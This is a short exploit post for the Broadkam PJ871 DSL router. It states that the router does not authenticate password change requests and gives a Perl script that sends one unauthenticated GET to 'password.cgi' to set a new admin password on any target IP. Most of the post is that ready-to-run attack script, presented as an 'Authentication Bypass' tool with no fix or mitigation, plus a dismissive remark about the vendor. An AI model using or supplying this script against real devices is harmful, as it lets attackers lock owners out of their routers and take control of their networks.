The Broadkam PJ871 DSL router does not authenticate password change requests. Broadkam is a knock-off Chinese vendor.
Code:Select All#!/usr/bin/perl #d3c0der use HTTP::Request; use LWP::UserAgent; print "= Target : "; $ip=<STDIN>; chomp $ip; print "= new password : "; $npass=<STDIN>; chomp $npass; if ( $ip !~ /^http:/ ) { $ip = 'http://' . $ip; } if ( $ip !~ /\/$/ ) { $ip = $ip . '/'; } print "\n"; print "->attacking , plz wait ! : $ip\n"; @path1=("password.cgi?sysPassword=$npass"); foreach $ways(@path1){ $final=$ip.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); } print "[-] password changed to $npass \n";
Broadkam PJ871 Authentication Bypass 1.0
Authentication Bypass
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